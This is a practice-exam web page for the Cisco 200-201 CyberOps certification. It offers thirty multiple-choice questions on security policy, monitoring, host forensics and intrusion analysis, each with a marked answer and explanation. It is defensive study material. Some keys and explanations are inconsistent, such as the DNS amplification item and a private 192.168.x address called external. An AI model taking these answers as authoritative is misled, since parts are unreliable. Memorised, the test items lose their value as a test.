Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

HomeCertifications200-201Exam Questions

Cisco · Free Practice Questions · Last reviewed May 2026

200-201 Exam Questions and Answers

30real exam-style questions organised by domain, each with the correct answer highlighted and a plain-English explanation of why it's right — and why the others are wrong.

95 exam questions
120 min time limit
Pass: Variable
5 exam domains
OverviewDomain BlueprintStudy GuideAll QuestionsSample by Domain
1. Security Policies and Procedures2. Security Concepts3. Security Monitoring4. Host-Based Analysis5. Network Intrusion Analysis
1

Domain 1: Security Policies and Procedures

All Security Policies and Procedures questions
Q1
mediumFull explanation →

A security analyst discovers that an employee has been sharing login credentials with coworkers. Which policy violation is this?

A

Remote Access Policy violation

B

Incident Response Policy violation

C

Data Classification Policy violation

D

Acceptable Use Policy violation

Sharing credentials is a misuse of company resources, violating the Acceptable Use Policy.

Why: Sharing login credentials violates the Acceptable Use Policy (AUP), which defines how employees may use company systems and data. The AUP typically prohibits password sharing because it undermines non-repudiation and access control, as each user should have unique credentials for accountability. This is a direct breach of acceptable behavior, not a failure of remote access, incident response, or data classification procedures.
Q2
easyFull explanation →

A company wants to ensure that employees report security incidents immediately. Which policy element is most important to include?

A

Specify encryption standards for data at rest

B

List acceptable uses of company resources

C

Define mandatory reporting procedures and contact information

Clear procedures encourage timely reporting.

D

Require complex passwords for all accounts

Why: Option C is correct because the core purpose of an incident response policy is to ensure timely reporting. Without mandatory reporting procedures and clear contact information, employees may delay or fail to report security incidents, increasing dwell time and potential damage. This directly supports the incident response lifecycle (NIST SP 800-61) by establishing a clear chain of communication for initial detection and reporting.
Q3
hardFull explanation →

An organization's security policy requires that all network traffic be inspected by an intrusion prevention system. However, encrypted traffic is bypassing inspection. Which change to the policy would best address this issue?

A

Allow encrypted traffic to bypass the IPS

B

Require all internal traffic to use unencrypted protocols

C

Implement SSL/TLS decryption at the network perimeter

Decryption enables the IPS to inspect encrypted payloads.

D

Exclude encrypted traffic from the security policy scope

Why: Option C is correct because implementing SSL/TLS decryption at the network perimeter allows the IPS to inspect the plaintext content of encrypted traffic. By terminating the encrypted session at a dedicated decryption device (e.g., a next-generation firewall or proxy), the device can re-encrypt the traffic after inspection, ensuring that threats hidden in HTTPS, SMTPS, or other TLS-encrypted flows are detected without violating the policy's requirement that all traffic be inspected.
Q4
easyFull explanation →

A security policy states that user activity logs must be retained for at least one year. What is the primary purpose of this requirement?

A

To support forensic investigations of security incidents

Logs provide evidence for post-incident analysis.

B

To improve system performance through log analysis

C

To comply with regulatory requirements only

D

To enable real-time monitoring of user behavior

Why: The primary purpose of retaining user activity logs for at least one year is to support forensic investigations of security incidents. When a breach or policy violation occurs, security analysts need historical log data to reconstruct the timeline of events, identify the initial compromise vector, and determine the scope of damage. Without long-term retention, critical evidence may be overwritten or purged before an incident is discovered, making root cause analysis impossible.
Q5
hardFull explanation →

A security analyst notices that an employee is accessing the corporate network from an unauthorized device. According to the security policy, which action should the analyst take first?

A

Report the employee to human resources for disciplinary action

B

Ignore the incident because it is a minor violation

C

Disable the device's network access immediately

Immediate containment is a typical first step.

D

Update the security policy to allow personal devices

Why: Option C is correct because the immediate priority when an unauthorized device is detected on the corporate network is to contain the threat by disabling network access. This aligns with the principle of least privilege and incident response procedures, where the first step is to stop the unauthorized access to prevent potential data breaches or malware propagation. The security policy typically mandates such immediate action to enforce access control, often implemented via 802.1X or MAC address filtering at the switch or NAC (Network Access Control) level.
Q6
mediumFull explanation →

A security policy requires that all changes to firewall rules be approved by two administrators. This is an example of which security principle?

A

Need to know

B

Defense in depth

C

Separation of duties

Two-person rule prevents unauthorized changes.

D

Least privilege

Why: The requirement that two administrators must approve firewall rule changes enforces separation of duties, a security principle that prevents any single individual from having exclusive control over a critical operation. This reduces the risk of unauthorized or malicious rule modifications by ensuring collusion or independent review is required. In firewall management, this is often implemented via change management workflows with distinct approval and implementation roles.

Want more Security Policies and Procedures practice?

Practice this domain
2

Domain 2: Security Concepts

All Security Concepts questions
Q1
easyFull explanation →

An organization wants to classify data based on its sensitivity and impact if disclosed. Which security principle is being applied?

A

Defense in depth

B

Confidentiality, integrity, and availability (CIA)

Data classification directly supports confidentiality and integrity by applying appropriate controls.

C

Least privilege

D

Data loss prevention

Why: The organization's goal is to classify data based on sensitivity and impact if disclosed, which directly aligns with the confidentiality component of the CIA triad. Confidentiality ensures that sensitive information is accessed only by authorized individuals, and classification is the foundational step to enforce this principle. The CIA triad (Confidentiality, Integrity, Availability) is the core security model that governs how data is protected based on its value and risk.
Q2
mediumFull explanation →

A SOC analyst notices repeated failed login attempts from a single IP address against multiple user accounts. Which type of attack is most likely occurring?

A

Credential stuffing

B

Brute force attack

C

Password spraying

Password spraying tries a few common passwords across many accounts.

D

Man-in-the-middle attack

Why: Password spraying (C) is correct because the attack involves a single IP address attempting the same common password against multiple user accounts. This technique avoids account lockout policies that typically trigger after a few failed attempts on a single account, making it distinct from brute force attacks that target one account with many passwords.
Q3
hardFull explanation →

A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?

A

Place both servers on the internal network with host-based firewalls

B

Place the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from DMZ to internal

DMZ isolates web server; blocking outbound from DMZ prevents pivot.

C

Use a VPN between the web server and database server

D

Place both servers on the same VLAN with a firewall between them

Why: Placing the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from the DMZ to internal, prevents an attacker who compromises the web server from initiating connections to the internal database server. This implements a default-deny rule for DMZ-to-internal traffic, forcing all database access to be initiated from the internal network only, which breaks the pivot chain. The DMZ acts as a buffer zone, isolating publicly accessible services from sensitive internal resources.
Q4
mediumFull explanation →

Which TWO security concepts are fundamental to the principle of least privilege? (Choose two.)

A

Role-based access control (RBAC)

RBAC implements least privilege by assigning permissions to roles.

B

Mandatory access control (MAC)

C

Need-to-know

Need-to-know restricts access to data required for tasks.

D

Separation of duties

E

Defense in depth

Why: Role-based access control (RBAC) is fundamental to the principle of least privilege because it assigns permissions based on job functions rather than individual users, ensuring users receive only the access necessary for their roles. The 'need-to-know' concept restricts access to information strictly required for a user's tasks, directly enforcing least privilege by limiting data exposure. Together, RBAC provides a scalable framework for access management, while need-to-know ensures granular data-level control.
Q5
hardFull explanation →

Which THREE are common indicators of a distributed denial-of-service (DDoS) attack? (Choose three.)

A

Slow network performance and service unavailability

Overwhelmed resources cause slowdowns.

B

A single IP address generating excessive traffic

C

High bandwidth consumption on the network link

DDoS floods the link with traffic.

D

Unusual traffic patterns from many different sources

Many sources indicate a distributed attack.

E

Encrypted traffic from a known malware C2 server

Why: Option A is correct because a DDoS attack floods the target with traffic from multiple sources, overwhelming network resources and causing legitimate requests to time out or be dropped. This results in slow network performance and service unavailability as the system struggles to process the excessive load. The distributed nature of the attack makes it difficult to mitigate with simple IP-based filtering.
Q6
easyFull explanation →

Which TWO are goals of a security operations center (SOC)? (Choose two.)

A

Continuous monitoring of security events

SOC monitors events 24/7.

B

Managing user passwords

C

Developing software applications

D

Performing penetration tests

E

Responding to security incidents

Incident response is a primary SOC role.

Why: Option A is correct because continuous monitoring of security events is a primary goal of a SOC, ensuring real-time detection of threats through log aggregation and analysis from sources like firewalls, IDS/IPS, and endpoints. This aligns with the SOC's responsibility to maintain situational awareness and identify indicators of compromise (IoCs) as part of the NIST incident response lifecycle.

Want more Security Concepts practice?

Practice this domain
3

Domain 3: Security Monitoring

All Security Monitoring questions
Q1
easyFull explanation →

An analyst notices repeated failed SSH attempts from an external IP to a server. The analyst wants to quickly see all SSH-related events from that IP in the last hour. Which approach is most efficient?

A

Search the SIEM for events with destination port 22 and source IP.

Directly retrieves SSH events for that IP.

B

Review all firewall logs for the past hour.

C

Run a packet capture on the server's network interface.

D

Check the server's auth.log file manually.

Why: Option A is correct because a SIEM indexes and correlates log data from multiple sources, allowing an analyst to quickly filter events by destination port 22 (SSH) and source IP without manually sifting through raw logs. This approach leverages the SIEM's search capabilities to retrieve only relevant events from the past hour, making it the most efficient method for targeted threat hunting.
Q2
mediumFull explanation →

A security team implements a network-based IPS. During testing, they find that legitimate traffic is frequently blocked. Which tuning approach should they prioritize?

A

Change the IPS to fail-open mode.

B

Increase the number of IPS sensors.

C

Disable or modify signatures causing false positives.

Directly addresses the root cause of legitimate traffic being blocked.

D

Reduce the IPS sensitivity level to lower.

Why: Option C is correct because false positives occur when IPS signatures incorrectly match legitimate traffic. The most direct and effective tuning approach is to disable or modify the specific signatures causing the false positives, which reduces unnecessary blocking without compromising overall security posture.
Q3
hardFull explanation →

An analyst is investigating a host that is beaconing to a known malicious domain every 60 seconds. The host also shows outbound connections to multiple IPs on port 443. To confirm the beaconing, which data source is most useful?

A

DNS logs from the internal DNS server.

B

NetFlow records from the border router.

Shows flow timestamps and destinations; reveals periodic connections.

C

Full packet capture of all outbound traffic.

D

Host-based firewall logs.

Why: NetFlow records from the border router provide aggregated metadata (source/destination IP, port, protocol, timestamps) that can reveal the periodic 60-second beaconing pattern to the malicious domain and the volume of outbound connections on port 443. Unlike DNS logs, NetFlow captures the actual connection attempts regardless of DNS resolution, making it ideal for identifying regular, repetitive outbound flows.
Q4
easyFull explanation →

A SOC analyst receives an alert for 'Malware Detected' from an endpoint sensor. The analyst checks the endpoint and sees a file named 'invoice.exe' in the Downloads folder. What should the analyst do first?

A

Escalate to a senior analyst.

B

Run a full antivirus scan.

C

Isolate the host from the network.

Contains the threat and prevents spread.

D

Delete the file immediately.

Why: The correct first step is to isolate the host from the network (C) because the alert indicates active malware ('invoice.exe' in Downloads). Containment is the immediate priority in incident response to prevent lateral movement and data exfiltration. Isolating the host stops any ongoing C2 communication or propagation over the network, aligning with the NIST SP 800-61 containment strategy.
Q5
mediumFull explanation →

A company uses a SIEM with correlation rules. They notice that a rule designed to detect brute-force attacks is not triggering even though failed logins are occurring. Which is the most likely cause?

A

The SIEM is receiving too many logs and dropping events.

B

The correlation rule threshold is set too high.

The number of failed attempts may be below the threshold.

C

The SIEM time zone is misconfigured.

D

The log source is not sending syslog data.

Why: A SIEM correlation rule for brute-force attacks typically triggers when the number of failed login attempts from a single source exceeds a defined threshold within a specific time window. If the threshold is set too high, the rule will not fire even though failed logins are occurring, because the count never reaches the required value. This is the most direct and common cause for a correlation rule not triggering when expected.
Q6
mediumFull explanation →

During an incident, an analyst needs to determine if a specific user account 'jsmith' was used from a remote IP during a breach window. Which log sources should the analyst check first?

A

NetFlow records from the core switch.

B

VPN concentrator logs.

C

File server audit logs.

D

Windows Security Event Logs (Event ID 4624, 4625).

Contains logon events with username and source IP.

Why: Windows Security Event Logs with Event ID 4624 (successful logon) and 4625 (failed logon) are the authoritative source for interactive and remote logon events on a Windows system. They record the target user account (jsmith), the source IP address of the remote connection, and the timestamp, making them the direct and most reliable log source to determine if a specific user account was used from a remote IP during a breach window.

Want more Security Monitoring practice?

Practice this domain
4

Domain 4: Host-Based Analysis

All Host-Based Analysis questions
Q1
mediumFull explanation →

A security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?

A

Run 'netstat -b' on the Windows host to display active connections with the associated process executable.

The -b flag shows the binary involved in creating each connection, directly correlating the connection to the process.

B

Examine the Windows Firewall log to see the source and destination IP addresses and ports for outbound traffic.

C

Review Windows Security Event Log for Event ID 4688 (Process Creation) for the timeline of process starts.

D

Use PowerShell cmdlet 'Get-NetTCPConnection' to list current TCP connections and their states.

Why: Running 'netstat -b' on a Windows host displays active TCP connections along with the executable name of the process that created each connection. This directly correlates the outbound connection to the malicious IP with the specific process, which is exactly what the analyst needs to identify the pivot point.
Q2
hardFull explanation →

Refer to the exhibit. A security analyst is analyzing a Windows host that is communicating with an external server at 192.168.1.50. Based on the output, which process is likely malicious?

A

svchost.exe (PID 1420) because it is connecting to an external IP on port 80.

B

cmd.exe (PID 2568) because it could be used to launch other processes.

C

powershell.exe (PID 2792) because it has an established HTTPS connection to an external server.

PowerShell making an outbound HTTPS connection is atypical and often used for malicious purposes.

D

notepad.exe (PID 2344) because it is not expecting to make any network connections.

Why: PowerShell.exe (PID 2792) is the likely malicious process because it has an established HTTPS connection (TCP port 443) to an external server at 192.168.1.50. PowerShell is a powerful scripting tool often abused by attackers to execute arbitrary code, download payloads, or establish command-and-control (C2) channels over encrypted HTTPS, which can evade detection by traditional signature-based security tools.
Q3
easyFull explanation →

A security analyst is investigating a host that is suspected of being compromised. The analyst runs a series of commands to gather information. Which TWO of the following commands are most useful for collecting volatile data from a live Windows system? (Choose two.)

A

netstat -anob

Shows active network connections with associated process IDs and executables.

B

tasklist /svc

Lists processes and their services, crucial for identifying running malware.

C

dir /s C:\Windows\System32\config

D

wevtutil qe System /c:10

E

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Why: The `netstat -anob` command displays active network connections, listening ports, and the associated process IDs (PIDs) along with the executable name. This is critical for identifying unauthorized outbound connections or backdoor listeners that indicate compromise. Because network state and process-to-port mappings reside in volatile memory (RAM), they are lost on reboot, making this command essential for live forensic collection.
Q4
mediumFull explanation →

Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?

A

DNS amplification attack

B

ARP spoofing

C

Brute force attempt on Telnet service

Multiple connection attempts to port 23 (Telnet) from the same source indicate a brute force or scanning activity.

D

ICMP flood attack

Why: The log shows repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23, which is the default port for Telnet. Multiple failed connection attempts to a Telnet service indicate a brute force attack, where an attacker tries to guess credentials by repeatedly attempting to log in.
Q5
hardFull explanation →

A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?

A

Examine the Windows Registry for Run keys to identify persistence mechanisms.

B

Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.

PowerShell ScriptBlock logging captures the full script content, directly showing attacker commands.

C

Review prefetch files (.pf) to determine when PowerShell was last executed.

D

Analyze network connection logs to identify outbound connections to known malicious IPs.

Why: PowerShell operational logs, specifically Event ID 4104 (Script Block Logging), capture the full text of PowerShell scripts and commands executed on the system. Since the analyst suspects the attacker used PowerShell to download additional tools, parsing these logs is the most direct and efficient first step to confirm that activity. This log source provides the actual commands run, including any download commands like Invoke-WebRequest or Start-BitsTransfer, without relying on indirect artifacts.
Q6
hardFull explanation →

An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)

A

Delete the malicious files found on the host

B

Isolate the host from the network

Isolating the host stops ongoing malicious activity and prevents lateral movement.

C

Collect a forensic image of the host's hard drive

A forensic image preserves volatile and non-volatile evidence for detailed analysis.

D

Reboot the host to clear any malware from memory

E

Run a full antivirus scan on the host

Why: Option B is correct because isolating the host from the network immediately stops the outbound connections to known malicious destinations, preventing further data exfiltration, lateral movement, or command-and-control (C2) communication. This containment step is critical in incident response to limit the blast radius before any other investigative or remediation actions are taken.

Want more Host-Based Analysis practice?

Practice this domain
5

Domain 5: Network Intrusion Analysis

All Network Intrusion Analysis questions
Q1
easyFull explanation →

A security analyst reviews an alert from the IPS that shows a spike in TCP SYN packets from an external IP to multiple internal hosts on port 443. What is the most likely attack type?

A

SYN flood

A SYN flood sends many TCP SYN packets to exhaust resources.

B

Port scanning

C

Man-in-the-middle

D

DNS amplification

Why: A SYN flood attack exploits the TCP three-way handshake by sending a high volume of SYN packets to multiple hosts without completing the handshake, exhausting server resources. The alert describes a spike in TCP SYN packets from an external IP to multiple internal hosts on port 443, which matches the behavior of a distributed SYN flood targeting HTTPS services. This is the most likely attack because the IPS is detecting the initial connection attempts characteristic of a SYN flood.
Q2
easyFull explanation →

An analyst notices that a host is sending large amounts of data to an external IP address on TCP port 22 during non-business hours. What is the most likely activity?

A

Remote administration

B

DNS query

C

FTP file transfer

D

Data exfiltration via SSH

SSH on port 22 can be used to tunnel data out.

Why: SSH (TCP port 22) is commonly used for secure remote administration, but the scenario describes large data transfers to an external IP during non-business hours, which is a classic indicator of data exfiltration. Attackers often use SSH tunneling to bypass security controls and exfiltrate data because SSH encrypts the traffic, making it difficult for network monitoring tools to inspect the payload. The combination of high volume, external destination, and off-hours activity strongly suggests malicious data theft rather than legitimate administrative tasks.
Q3
mediumFull explanation →

An analyst sees an alert: 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent (Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1)'. The source is an internal host that typically uses Windows 10. What should the analyst suspect?

A

The traffic is from a web proxy

B

The host is running Windows XP

C

The host is running a browser update

D

The traffic is likely generated by malware

Malware often uses old User-Agents to evade detection.

Why: The User-Agent string 'Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1' mimics Internet Explorer 6 on Windows XP (NT 5.1). Since the source host normally runs Windows 10, this outdated and mismatched User-Agent is a strong indicator of malware attempting to disguise its traffic as legacy browser activity to evade detection.
Q4
mediumFull explanation →

During an investigation, an analyst finds that an internal host has been communicating with a known malicious IP on port 445. Which protocol is most likely involved?

A

SSH

B

RDP

C

SMB

SMB uses port 445.

D

HTTP

Why: Port 445 is the default port for Microsoft SMB (Server Message Block) over TCP, used for file sharing, printer sharing, and other network services. Communication with a known malicious IP on this port strongly indicates SMB-based activity, such as exploitation of vulnerabilities like EternalBlue (MS17-010) or unauthorized file access.
Q5
hardFull explanation →

An analyst reviews NetFlow data and sees a single internal IP communicating with many external IPs on port 53, each with small UDP packets. The internal host is not a DNS server. What is the most likely explanation?

A

The host is acting as a DNS server

B

The host is performing recursive DNS lookups

C

The host is the victim of a DNS amplification attack

The host's IP is spoofed as the source of queries to many open resolvers, causing replies to flood the host.

D

The host is scanning for open DNS resolvers

Why: The internal host is not a DNS server, yet it is sending small UDP packets to many external IPs on port 53. This is characteristic of a DNS amplification attack, where the attacker spoofs the victim's IP address and sends small queries to open DNS resolvers, which then send large responses to the victim. The NetFlow data shows the victim receiving the amplified traffic, not initiating it, making C correct.
Q6
hardFull explanation →

A security analyst detects a large number of TCP RST packets from a single external IP to various internal hosts. The internal hosts are not sending any corresponding packets. What is the most likely cause?

A

A denial-of-service attack is occurring

B

A TCP connection is being established

C

A port scan is in progress

D

A TCP reset attack is being performed

Forged RST packets terminate connections prematurely.

Why: A TCP reset attack (also known as a forged RST attack) occurs when an attacker sends spoofed TCP RST packets to disrupt an existing connection. The key clue is that the internal hosts are not sending any corresponding packets, indicating the RST packets are unsolicited and likely forged, which is characteristic of this attack rather than a normal network event.

Want more Network Intrusion Analysis practice?

Practice this domain

Frequently asked questions

How many questions are on the 200-201 exam?

The 200-201 exam has 95 questions and must be completed in 120 minutes. Cisco passing scores vary by exam version and are not always publicly listed. Check the official Cisco exam page before booking.

What types of questions appear on the 200-201 exam?

CLI output interpretation, network topology analysis, routing behaviour, switching concepts, troubleshooting, and configuration questions.

How are 200-201 questions organised by domain?

The exam covers 5 domains: Security Policies and Procedures, Security Concepts, Security Monitoring, Host-Based Analysis, Network Intrusion Analysis. Questions are weighted by domain — higher-weight domains appear more on your actual exam.

Are these the actual 200-201 exam questions?

No. These are original exam-style practice questions written against the official Cisco 200-201 exam objectives. They are not copied from the real exam. Courseiva focuses on genuine understanding, not memorisation of braindumps.

Ready to practice all 95 200-201 questions?

Courseiva tracks your accuracy per domain and routes you toward weak areas automatically. Free, no account required.

Browse all 200-201 questionsTake a timed practice test